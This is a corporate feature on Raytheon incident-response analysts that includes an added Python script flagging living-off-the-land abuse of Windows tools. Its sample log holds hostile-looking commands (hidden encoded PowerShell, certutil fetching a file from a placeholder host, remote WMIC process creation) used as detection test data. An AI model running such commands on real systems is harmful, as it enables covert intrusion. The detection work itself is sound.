Collaboration and automation in a matrix of malware
“Every day presents a new challenge,” said Jack, a cybersecurity analyst technical lead. “Sometimes we’re handed a hard drive with minimal information, other times we’re in environments with tens of thousands of systems to analyze.”
Jack explains how crucial collaborating is, emphasizing how team dynamics help ensure nothing is overlooked.
“My colleagues will be sitting there looking at the same data set, and they’re going to find something I may have missed. It’s knowing each other’s strong points and playing off each other,” Jack said.
Raytheon is investing in automation to discover and analyze incidents faster, eliminate human error and produce actionable intelligence more quickly.
Automating rote tasks frees up the team to use their critical-thinking skills and work more closely with customers, tailoring their approach based on the specifics of an incident and the complexity of the network.
“If industrial control systems are involved, we bring in our specialists in that domain,” said James, a cyber incident response manager. “Likewise, if it’s a cloud infrastructure issue, our cloud experts step in.”
Looking for a needle in a stack of needles
Regina is a cybersecurity analyst lead, overseeing more than 30 team members. Her analysts comb through data to look for evidence of cyberattacks, uncovering anomalies and finding any intrusions.
“It’s like searching for a needle in a stack of needles,” Regina said.
Some of the hardest intrusions to detect are those designed to happen quietly and invisibly. A tactic employed by attackers, called “living off the land,” uses tools already native to the environment rather than introducing new malware, so that the activity creates no obvious anomaly and thus avoids detection.
“It blurs the line between legitimate activity and potential threats,” said Joseph, a cybersecurity analyst.
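Because the tool itself is legitimate, detection of living-off-the-land activity has to rest on context: which process launched the tool, under which user, and with what arguments. The following is an added illustration of that idea, not Raytheon's tooling or anything described on this page. It assumes a simple key=value process-creation log format, and the tool names, parent-process list and argument patterns are assumptions chosen for the demo rather than an exhaustive rule set.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Added example: context-based triage of native-tool executions.
# All lists below are illustrative assumptions, not a complete detection policy.

# Native administration tools that attackers commonly reuse (assumed list).
NATIVE_TOOLS = {"powershell.exe", "certutil.exe", "wmic.exe",
                "rundll32.exe", "mshta.exe", "bitsadmin.exe"}

# Parent processes from which an admin tool rarely spawns in normal use (assumed list).
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}

# Command-line patterns showing the tool being used outside its normal role.
SUSPICIOUS_ARGS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"(^|\s)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
     "encoded PowerShell command"),
    (re.compile(r"-urlcache|-decode", re.I), "certutil fetching or decoding a file"),
    (re.compile(r"process\s+call\s+create", re.I), "WMIC spawning a process"),
    (re.compile(r"(javascript|vbscript):", re.I), "script protocol handler in arguments"),
]


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


# Matches key=value pairs, where the value is either a quoted string or a bare token.
_KV = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed log line into a ProcessEvent."""
    fields = {m.group(1): (m.group(3) if m.group(3) is not None else m.group(4))
              for m in _KV.finditer(line)}
    return ProcessEvent(fields["host"], fields["user"], fields["parent"].lower(),
                        fields["image"].lower(), fields.get("cmdline", ""))


def assess(ev: ProcessEvent) -> List[str]:
    """Return the reasons an event looks like living-off-the-land activity.

    The tool name alone is never a reason: running PowerShell is routine. Only
    the surrounding context (parent process, argument shape) produces a finding.
    """
    reasons: List[str] = []
    if ev.image not in NATIVE_TOOLS:
        return reasons  # not a native admin tool; outside the scope of this check
    if ev.parent in UNUSUAL_PARENTS:
        reasons.append(f"{ev.image} spawned by document handler {ev.parent}")
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(ev.cmdline):
            reasons.append(label)
    return reasons


def triage(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Run assess() over a batch of log lines and keep only events with findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        reasons = assess(ev)
        if reasons:
            findings.append((ev.host, ev.image, reasons))
    return findings


# Constructed sample log lines for the demo; hosts, users and commands are made up.
SAMPLE_LOG = [
    'host=WS01 user=alice parent=explorer.exe image=powershell.exe cmdline="powershell.exe -Command Get-Date"',
    'host=WS02 user=bob parent=winword.exe image=powershell.exe cmdline="powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"',
    'host=WS03 user=carol parent=cmd.exe image=certutil.exe cmdline="certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin"',
    'host=WS04 user=dave parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"',
    'host=WS05 user=erin parent=powershell.exe image=wmic.exe cmdline="wmic.exe /node:WS06 process call create calc.exe"',
]

if __name__ == "__main__":
    for host, image, reasons in triage(SAMPLE_LOG):
        print(f"{host}: {image} -> {'; '.join(reasons)}")
```

The benign PowerShell launch on WS01 produces no finding even though the binary is on the watch list, which is the point Joseph makes above: the same tool is both legitimate activity and a potential threat, and only the context separates them. In a real environment the parent and argument lists would be tuned against a baseline of what each host normally runs.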
Regina and many of her colleagues have a saying: “Bad actors only need to win once. We have to win every time.”
“The bad guys often have the upper hand because they operate without any rules, while we, as the defenders, must operate within strict boundaries,” she said.
Each day presents a different challenge for Regina and her team, from misconfigured servers and insecure edge devices to potential breaches that require swift action. However, it is not just about reacting to problems as they arise; it is also about proactively hunting down vulnerabilities and strengthening security measures.